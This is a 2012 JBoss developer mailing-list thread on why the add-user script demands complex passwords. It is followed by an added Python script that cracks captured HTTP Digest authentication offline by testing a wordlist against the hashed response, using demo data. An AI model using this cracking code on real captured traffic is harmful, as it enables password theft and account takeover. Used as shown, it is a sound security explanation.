[jboss-as7-dev] Relaxing password requirements for add-user script?

Jaikiran Pai jpai at redhat.com
Wed Oct 10 06:11:32 EDT 2012


On Wednesday 10 October 2012 03:20 PM, Darran Lofthouse wrote:
> Would also add for those working on this day to day there is nothing 
> to stop you backing up your properties files and just copying them 
> back in after a build - it is not really necessary to be running 
> through the add user process.
>
That's a good point! I'll happily use this trick.

-Jaikiran

> Regards,
> Darran Lofthouse.
>
>
> On 10/10/2012 10:47 AM, Darran Lofthouse wrote:
>> On 10/10/2012 08:23 AM, Jaikiran Pai wrote:
>>> I never have
>>> understood this specific requirement of passwords being forced to be of
>>> certain type (many sites do it).
>>
>> The reason for the requirement is to reduce the effectiveness of
>> dictionary based attacks by stopping the users from using commonly used
>> words for their password.
>>
>> For Digest authentication which we are using by default the password is
>> not transmitted in the clear - however a hash is transmitted and apart
>> from the password used to generate the hash the rest of the information
>> used to generate the hash is also visible.
>>
>> At this point if you want to discover the user's password you can try
>> brute force regenerating the hashes by trying out one candidate password
>> after another - passwords could be anything so this is a big task,
>> however if most users are just going to pick a normal word or a name or
>> something common like that you have a much smaller sample to use to
>> discover their password by trying each entry in the smaller sample.
>>
>> This brute force discovery of a password occurs offline and only
>> requires the hashes from the captured packets so we can't detect that it
>> is happening so instead a policy is in place to ensure more complex
>> passwords are chosen - this way the brute force discovery has a much
>> larger sample of passwords.
>>
>> Ideally SSL/TLS would still be enabled for these connections which would
>> prevent even the hashes being seen but compared to BASIC authentication
>> where capturing one packet gets you the user's password this is a step up
>> as an intermediate step.
>>
>>> I'm not a security expert, but is this "your password has to have upper
>>> case, lower case, digit, special char" requirement really worth it in a
>>> real application?
>>>
>>>
>>> [1]
>>> https://issues.jboss.org/browse/AS7-2756?focusedCommentId=12653165&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-12653165 
>>>
>>>
>>> -Jaikiran
>>> _______________________________________________
>>> jboss-as7-dev mailing list
>>> jboss-as7-dev at lists.jboss.org
>>> https://lists.jboss.org/mailman/listinfo/jboss-as7-dev
>>>
>>
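The offline attack Darran describes above, as an added illustration (this is not code from JBoss AS7 or from anyone in the thread): a client's Digest "response" is MD5(HA1:nonce[:nc:cnonce:qop]:HA2) with HA1 = MD5(user:realm:password), and every input except the password travels in the Authorization header. Whoever captures one request can therefore recompute the hash for candidate passwords without ever touching the server. The captured exchanges, the realm name, nonce, URI and the wordlist below are all constructed for the demo and are assumptions, not real traffic.

```python
"""Offline dictionary attack against a captured HTTP Digest exchange.

Added illustration only; not code from JBoss AS7 or from the mail thread.
Captures, realm, nonce, URI and wordlist are CONSTRUCTED for the demo.
"""
import hashlib
from typing import Dict, Iterable, Optional


def _md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(user: str, realm: str, password: str) -> str:
    """RFC 2617 HA1 = MD5(username:realm:password).

    The username and realm are visible on the wire; only the password is
    secret, which is the whole reason a dictionary is enough to recover it.
    """
    return _md5_hex(f"{user}:{realm}:{password}")


def digest_response(user: str, realm: str, password: str, nonce: str,
                    method: str, uri: str, qop: Optional[str] = None,
                    nc: str = "", cnonce: str = "") -> str:
    """Compute the Digest 'response' field exactly as a client would."""
    ha2 = _md5_hex(f"{method}:{uri}")
    if qop:
        # RFC 2617 form with qop=auth: MD5(HA1:nonce:nc:cnonce:qop:HA2)
        return _md5_hex(f"{ha1(user, realm, password)}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    # RFC 2069 form without qop: MD5(HA1:nonce:HA2)
    return _md5_hex(f"{ha1(user, realm, password)}:{nonce}:{ha2}")


def make_capture(user: str, realm: str, password: str, nonce: str, method: str,
                 uri: str, qop: Optional[str] = None, nc: str = "",
                 cnonce: str = "") -> Dict[str, str]:
    """Build the fields a sniffer would see in one Authorization header.

    Constructed for the demo: a real attacker never knows `password`, they
    only see the resulting `response` plus the other public fields.
    """
    return {
        "user": user, "realm": realm, "nonce": nonce, "method": method,
        "uri": uri, "qop": qop or "", "nc": nc, "cnonce": cnonce,
        "response": digest_response(user, realm, password, nonce, method, uri, qop, nc, cnonce),
    }


def offline_dictionary_attack(cap: Dict[str, str], candidates: Iterable[str]) -> Optional[str]:
    """Recompute the response for each candidate password.

    Nothing is sent to the server, so no lockout or log entry can reveal
    that this is happening; the only defence is a password not in the list.
    """
    for pw in candidates:
        guess = digest_response(cap["user"], cap["realm"], pw, cap["nonce"],
                                cap["method"], cap["uri"], cap["qop"] or None,
                                cap["nc"], cap["cnonce"])
        if guess == cap["response"]:
            return pw
    return None


# Constructed wordlist: the "much smaller sample" the mail refers to.
WORDLIST = ["admin", "welcome", "jboss", "password1", "summer2012", "letmein"]

# Constructed captures; realm, nonce, URI, nc and cnonce are assumed values.
_NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"
WEAK_CAPTURE = make_capture("admin", "ManagementRealm", "password1", _NONCE,
                            "GET", "/management", qop="auth",
                            nc="00000001", cnonce="0a4f113b")
STRONG_CAPTURE = make_capture("admin", "ManagementRealm", "Tq7#vLm9!pR2wZ", _NONCE,
                              "GET", "/management", qop="auth",
                              nc="00000001", cnonce="0a4f113b")


def demo() -> Dict[str, Optional[str]]:
    """Weak password falls to the wordlist; the complex one does not."""
    return {
        "weak": offline_dictionary_attack(WEAK_CAPTURE, WORDLIST),
        "strong": offline_dictionary_attack(STRONG_CAPTURE, WORDLIST),
    }


if __name__ == "__main__":
    print(demo())
```

The point of the two captures is the one made in the mail: the hash construction is identical in both cases, and the only thing that decides whether the attacker wins is whether the password sits inside the small sample they are willing to try. Putting the connection under TLS removes the capture step entirely, which is why it is still the recommended configuration.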


